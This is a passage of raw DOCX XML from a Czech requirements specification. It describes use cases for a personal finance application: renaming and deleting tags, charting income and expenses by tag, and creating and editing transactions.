      </w:r>
      <w:r>
        <w:t>upravit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00432042" w:rsidRDefault="00432042" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém vygeneruje formulář</w:t>
      </w:r>
      <w:r w:rsidR="00C17C5A">
        <w:t xml:space="preserve"> umožňující </w:t>
      </w:r>
      <w:r>
        <w:t>změnit název štítku.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00432042" w:rsidRDefault="00432042" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel změní název štítku a odešle formulář.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00432042" w:rsidRDefault="00432042" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém ověří</w:t>
      </w:r>
      <w:r w:rsidR="00E06A3E">
        <w:t xml:space="preserve"> unikátnost nového</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> názv</w:t>
      </w:r>
      <w:r w:rsidR="00E06A3E">
        <w:t>u</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a uloží změny.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00432042" w:rsidRDefault="00432042" w:rsidP="00432042">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Alternativní tok 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00432042" w:rsidRPr="00EA15C6" w:rsidRDefault="00432042" w:rsidP="00432042">
      <w:r>
        <w:t>4.1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Jestliže uživatel zadal název již existující</w:t>
      </w:r>
      <w:r w:rsidR="00E06A3E">
        <w:t>ho</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> štítku, je na tuto skutečnost upozorněn a musí zvolit jiný název. UC pokračuje krokem 3 základního toku.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00432042" w:rsidRDefault="00432042" w:rsidP="00432042">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky po dokončení</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00432042" w:rsidRPr="00EA15C6" w:rsidRDefault="00432042" w:rsidP="00432042">
      <w:r>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidR="00381787">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>systému je uložen nový název štítku.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004954AE" w:rsidRDefault="004954AE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00432042" w:rsidRDefault="00381787" w:rsidP="00381787">
      <w:pPr>
        <w:pStyle w:val="Nadpis4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">UC14: </w:t>
      </w:r>
      <w:r w:rsidR="00432042">
        <w:t xml:space="preserve">Odstranění </w:t>
      </w:r>
      <w:r w:rsidR="000D5494">
        <w:t>štítku</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00432042" w:rsidRPr="002F5FD7" w:rsidRDefault="00432042" w:rsidP="00432042">
      <w:r>
        <w:t>UC umožňuje uživateli odstranit existující štítek ze systému.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00432042" w:rsidRPr="008F1CD3" w:rsidRDefault="00432042" w:rsidP="00432042">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Aktéři</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00432042" w:rsidRDefault="00432042" w:rsidP="00432042">
      <w:r>
        <w:t>Zaregistrovaný uživatel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00432042" w:rsidRDefault="00432042" w:rsidP="00432042">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky pro spuštění</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00432042" w:rsidRPr="00173253" w:rsidRDefault="00432042" w:rsidP="00432042">
      <w:r>
        <w:t>Uživatel je přihlášen do systému.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00432042" w:rsidRDefault="00432042" w:rsidP="00432042">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Základní tok</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00432042" w:rsidRDefault="00432042" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel v</w:t>
      </w:r>
      <w:r w:rsidR="00381787">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">seznamu štítků vybere štítek, který </w:t>
      </w:r>
      <w:r w:rsidR="00710DAF">
        <w:t xml:space="preserve">si přeje </w:t>
      </w:r>
      <w:r>
        <w:t>odstranit a zvolí u něj možnost odstranit štítek.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00791FC9" w:rsidRDefault="00432042" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Systém uživatele informuje o nenávratnosti tohoto kroku a vyžádá si </w:t>
      </w:r>
      <w:r w:rsidR="00791FC9">
        <w:t xml:space="preserve">jeho </w:t>
      </w:r>
      <w:r>
        <w:t>potvrzení</w:t>
      </w:r>
      <w:r w:rsidR="00791FC9">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00432042" w:rsidRDefault="00432042" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel potvrdí svůj úmysl odstranit vybraný štítek.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00432042" w:rsidRPr="00EA15C6" w:rsidRDefault="00432042" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Vybraný štítek je odstraněn ze systému. Všechny transakce, které byly tímto štítkem označeny zůstávají nadále v</w:t>
      </w:r>
      <w:r w:rsidR="00381787">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>systému</w:t>
      </w:r>
      <w:r w:rsidR="00FF0B2B">
        <w:t>, ale</w:t>
      </w:r>
      <w:r w:rsidR="00791FC9">
        <w:t xml:space="preserve"> už </w:t>
      </w:r>
      <w:r w:rsidR="00FF0B2B">
        <w:t>nejsou</w:t>
      </w:r>
      <w:r w:rsidR="00791FC9">
        <w:t xml:space="preserve"> daným štítkem</w:t>
      </w:r>
      <w:r w:rsidR="00FF0B2B">
        <w:t xml:space="preserve"> označeny.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B03673" w:rsidRDefault="00B03673" w:rsidP="00B03673">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r>
        <w:t>Alternativní tok 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B03673" w:rsidRDefault="00B03673" w:rsidP="00B03673">
      <w:r>
        <w:t>2.1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Pokud uživatel chce </w:t>
      </w:r>
      <w:r w:rsidR="00981FE8">
        <w:t>odstranit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> štítek, který je spojen s</w:t>
      </w:r>
      <w:r w:rsidR="00381787">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">existujícím vozidlem, tak je informován o nemožnosti </w:t>
      </w:r>
      <w:r w:rsidR="00981FE8">
        <w:t>odstranění</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> daného štítku a UC končí.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0037426E" w:rsidRDefault="0037426E" w:rsidP="0037426E">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r>
        <w:t>Alternativní tok 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0037426E" w:rsidRPr="009A0BD8" w:rsidRDefault="0037426E" w:rsidP="00B03673">
      <w:r>
        <w:t>2.1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Pokud uživatel chce </w:t>
      </w:r>
      <w:r w:rsidR="00981FE8">
        <w:t xml:space="preserve">odstranit </w:t>
      </w:r>
      <w:r>
        <w:t>štítek, který je spojen s</w:t>
      </w:r>
      <w:r w:rsidR="00381787">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">existujícím rozpočtem, tak je informován o nemožnosti </w:t>
      </w:r>
      <w:r w:rsidR="00981FE8">
        <w:t xml:space="preserve">odstranění </w:t>
      </w:r>
      <w:r>
        <w:t>daného štítku a UC končí.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00432042" w:rsidRDefault="00432042" w:rsidP="00432042">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t xml:space="preserve">Alternativní tok </w:t>
      </w:r>
      <w:r w:rsidR="0037426E">
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00432042" w:rsidRDefault="00432042" w:rsidP="00432042">
      <w:r>
        <w:t>3.1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Pokud uživatel nepotvrdí svůj úmysl odstranit vybraný </w:t>
      </w:r>
      <w:r w:rsidR="00FF0B2B">
        <w:t>štítek</w:t>
      </w:r>
      <w:r>
        <w:t>, tak UC končí.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00432042" w:rsidRDefault="00432042" w:rsidP="00432042">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky po dokončení</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00FF0B2B" w:rsidP="0056590E">
      <w:r>
        <w:t>Štítek</w:t>
      </w:r>
      <w:r w:rsidR="00432042">
        <w:t xml:space="preserve"> je odstraněn ze systému</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a nejsou jím označeny žádné existující transakce</w:t>
      </w:r>
      <w:r w:rsidR="00432042">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004954AE" w:rsidRDefault="004954AE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0094098E" w:rsidRDefault="00381787" w:rsidP="00381787">
      <w:pPr>
        <w:pStyle w:val="Nadpis4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">UC15: </w:t>
      </w:r>
      <w:r w:rsidR="0094098E">
        <w:t>Zobrazení grafů vývoje příjmů a výdajů za zvolený štítek</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0094098E" w:rsidRPr="002F5FD7" w:rsidRDefault="0094098E" w:rsidP="0094098E">
      <w:r>
        <w:t>UC umožňuje uživateli zobrazení grafů vývoje příjmů a výdajů za vybraný štítek ve zvoleném časovém období.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0094098E" w:rsidRPr="008F1CD3" w:rsidRDefault="0094098E" w:rsidP="0094098E">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Aktéři</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0094098E" w:rsidRDefault="0094098E" w:rsidP="0094098E">
      <w:r>
        <w:t>Zaregistrovaný uživatel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0094098E" w:rsidRDefault="0094098E" w:rsidP="0094098E">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky pro spuštění</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0094098E" w:rsidRPr="00173253" w:rsidRDefault="0094098E" w:rsidP="0094098E">
      <w:r>
        <w:t>Uživatel je přihlášen do systému.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0094098E" w:rsidRDefault="0094098E" w:rsidP="0094098E">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Základní tok</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0094098E" w:rsidRDefault="0094098E" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel v seznamu štítků vybere štítek, pro který chce zobrazit grafy a zvolí možnost zobrazení statistik.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0094098E" w:rsidRDefault="0094098E" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém vygeneruje formulář.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0094098E" w:rsidRDefault="0094098E" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Uživatel ve formuláři zvolí časové období </w:t>
      </w:r>
      <w:r w:rsidR="005A3105">
        <w:t xml:space="preserve">a vybere účty, které se do grafu mají zahrnout </w:t>
      </w:r>
      <w:r>
        <w:t>a formulář odešle.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0094098E" w:rsidRPr="00EA15C6" w:rsidRDefault="0094098E" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Systém </w:t>
      </w:r>
      <w:r w:rsidR="00805571">
        <w:t>zobrazí grafy vývoje příjmů a výdajů označených vybraným štítkem za zvolené časové období. Příjmy a výdaje jsou agregované po dnech, týdnech, měsících nebo letech v závislosti na délce zvoleného časového období.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0094098E" w:rsidRDefault="0094098E" w:rsidP="0094098E">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Alternativní tok 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00805571" w:rsidRPr="00805571" w:rsidRDefault="00805571" w:rsidP="00805571">
      <w:r>
        <w:t>4.1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Pokud ve zvoleném časovém období nejsou evidovány žádné transakce označené vybraným štítkem, tak grafy nejsou zobrazeny.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0094098E" w:rsidRDefault="0094098E" w:rsidP="0094098E">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky po dokončení</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00805571" w:rsidRPr="00805571" w:rsidRDefault="00805571" w:rsidP="00805571">
      <w:r>
        <w:t>Uživateli jsou zobrazeny grafy vývoje příjmů a výdajů označených vybraným štítkem za zvolené časové období.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00381787" w:rsidRDefault="00381787">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E6D75" w:rsidRDefault="003E6D75" w:rsidP="003E6D75">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="137" w:name="_Toc387327855"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Správa transakcí</w:t>
      </w:r>
      <w:bookmarkEnd w:id="137"/>
    </w:p>
    <w:p w:rsidR="00AA5B9F" w:rsidRDefault="00AA5B9F" w:rsidP="00AA5B9F">
      <w:r>
        <w:t>V této podkapitole jsou popsány scénáře, které se týkají správy transakcí. Transakce jsou základním kamenem aplikace a slouží k evidování jednotlivých pohybů na účtech.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5B9F" w:rsidRDefault="00381787" w:rsidP="00381787">
      <w:pPr>
        <w:pStyle w:val="Nadpis4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="138" w:name="_Ref384580658"/>
      <w:r>
        <w:t xml:space="preserve">UC16: </w:t>
      </w:r>
      <w:r w:rsidR="00AA5B9F">
        <w:t>Vytvoření nové transakce</w:t>
      </w:r>
      <w:bookmarkEnd w:id="138"/>
    </w:p>
    <w:p w:rsidR="00AA5B9F" w:rsidRPr="002F5FD7" w:rsidRDefault="00AA5B9F" w:rsidP="00AA5B9F">
      <w:r>
        <w:t>UC umožňuje uživateli vytvořit novou transakci.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5B9F" w:rsidRPr="008F1CD3" w:rsidRDefault="00AA5B9F" w:rsidP="00AA5B9F">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Aktéři</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5B9F" w:rsidRDefault="00AA5B9F" w:rsidP="00AA5B9F">
      <w:r>
        <w:t>Zaregistrovaný uživatel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5B9F" w:rsidRDefault="00AA5B9F" w:rsidP="00AA5B9F">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky pro spuštění</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5B9F" w:rsidRPr="00173253" w:rsidRDefault="00AA5B9F" w:rsidP="00AA5B9F">
      <w:r>
        <w:t>Uživatel je přihlášen do systému.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5B9F" w:rsidRDefault="00AA5B9F" w:rsidP="00AA5B9F">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Základní tok</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5B9F" w:rsidRDefault="00AA5B9F" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel zvolí možnost vytvoření nové transakce.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5B9F" w:rsidRDefault="00AA5B9F" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém vygeneruje formulář.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5B9F" w:rsidRDefault="00AA5B9F" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel zvolí, zda se jedná o příjem, výdaj nebo o převod mezi účty</w:t>
      </w:r>
      <w:r w:rsidR="00A5210C">
        <w:t xml:space="preserve">, dále vybere účet, ke kterému </w:t>
      </w:r>
      <w:r w:rsidR="00791FC9">
        <w:t xml:space="preserve">se </w:t>
      </w:r>
      <w:r w:rsidR="00A5210C">
        <w:t xml:space="preserve">transakce </w:t>
      </w:r>
      <w:r w:rsidR="00791FC9">
        <w:t>vztahuje</w:t>
      </w:r>
      <w:r w:rsidR="00A5210C">
        <w:t xml:space="preserve"> (v</w:t>
      </w:r>
      <w:r>
        <w:t> případě převodu mezi účty uživatel vybere zdrojový a cílový účet</w:t>
      </w:r>
      <w:r w:rsidR="00A5210C">
        <w:t xml:space="preserve">), nominální </w:t>
      </w:r>
      <w:r w:rsidR="00F00E35">
        <w:t xml:space="preserve">hodnotu </w:t>
      </w:r>
      <w:r w:rsidR="00A5210C">
        <w:t xml:space="preserve">a datum uskutečnění transakce. Volitelně uživatel přidá popis transakce a označí transakci štítky. První zadaný štítek je považován za hlavní kategorizační štítek, další štítky jsou upřesňující. Uživateli jsou nabízeny existující štítky, ale přitom může zadat jakýkoliv text, který se použije pro případné vytvoření nového štítku. </w:t>
      </w:r>
      <w:r>
        <w:t>Nakonec uživatel odešle formulář.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5B9F" w:rsidRDefault="00AA5B9F" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém vytvoří nov</w:t>
      </w:r>
      <w:r w:rsidR="00A5210C">
        <w:t>ou transakci</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A5210C">
        <w:t xml:space="preserve"> V případě, že uživatel transakci označil štítkem, který ještě neexistuje, tak je automaticky vytvořen</w:t>
      </w:r>
      <w:r w:rsidR="00887981">
        <w:t xml:space="preserve"> nový štítek</w:t>
      </w:r>
      <w:r w:rsidR="00A5210C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00887981" w:rsidRDefault="00887981" w:rsidP="00887981">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Alternativní tok 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00887981" w:rsidRDefault="00887981" w:rsidP="00887981">
      <w:r>
        <w:t>3.1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Uživatel se může rozhodnout </w:t>
      </w:r>
      <w:r w:rsidR="00791FC9">
        <w:t xml:space="preserve">současně </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">vytvořit novou opakovanou transakci, v tom případě je scénář rozšířen o </w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> REF _Ref385937757 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:t>UC21: Vytvoření nové opakované transakce</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00887981" w:rsidRDefault="00887981" w:rsidP="00887981">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r>
        <w:t>Alternativní tok 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00791FC9" w:rsidRPr="00791FC9" w:rsidRDefault="00887981" w:rsidP="00791FC9">
      <w:r>
        <w:t>3.1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Uživatel se může rozhodnout </w:t>
      </w:r>
      <w:r w:rsidR="00791FC9">
        <w:t xml:space="preserve">současně </w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00791FC9">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>transakcí</w:t>
      </w:r>
      <w:r w:rsidR="00791FC9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>evidovat</w:t>
      </w:r>
      <w:r w:rsidR="00791FC9">
        <w:t xml:space="preserve"> také</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tankování vozidla, v tom případě je scénář rozšířen o </w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00791FC9">
        <w:instrText xml:space="preserve"> REF _Ref387312234 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:t>UC30: Evidence tankování vozidla</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00791FC9">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5B9F" w:rsidRDefault="00AA5B9F" w:rsidP="00AA5B9F">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky po dokončení</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004954AE" w:rsidRDefault="00AA5B9F" w:rsidP="004954AE">
      <w:r>
        <w:t>Nov</w:t>
      </w:r>
      <w:r w:rsidR="00A5210C">
        <w:t>á</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A5210C">
        <w:t xml:space="preserve">transakce </w:t>
      </w:r>
      <w:r w:rsidR="003414D8">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r>
        <w:t>je uložen</w:t>
      </w:r>
      <w:r w:rsidR="00A5210C">
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> v</w:t>
      </w:r>
      <w:r w:rsidR="003414D8">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>systému</w:t>
      </w:r>
      <w:r w:rsidR="003414D8">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A5210C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003414D8">
        <w:t>V případě, kdy uživatel označil transakci neexistujícím štítkem, je tento štítek vytvořen.</w:t>
      </w:r>
      <w:r w:rsidR="004954AE">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5B9F" w:rsidRDefault="00381787" w:rsidP="004954AE">
      <w:pPr>
        <w:pStyle w:val="Nadpis4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">UC17: </w:t>
      </w:r>
      <w:r w:rsidR="00AA5B9F">
        <w:t xml:space="preserve">Editace </w:t>
      </w:r>
      <w:r w:rsidR="00A5210C">
        <w:t>transakce</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5B9F" w:rsidRPr="002F5FD7" w:rsidRDefault="00AA5B9F" w:rsidP="00AA5B9F">
      <w:r>
        <w:t xml:space="preserve">UC umožňuje uživateli upravit existující </w:t>
      </w:r>
      <w:r w:rsidR="00A5210C">
        <w:t>transakci</w:t>
      </w:r>
      <w:r>
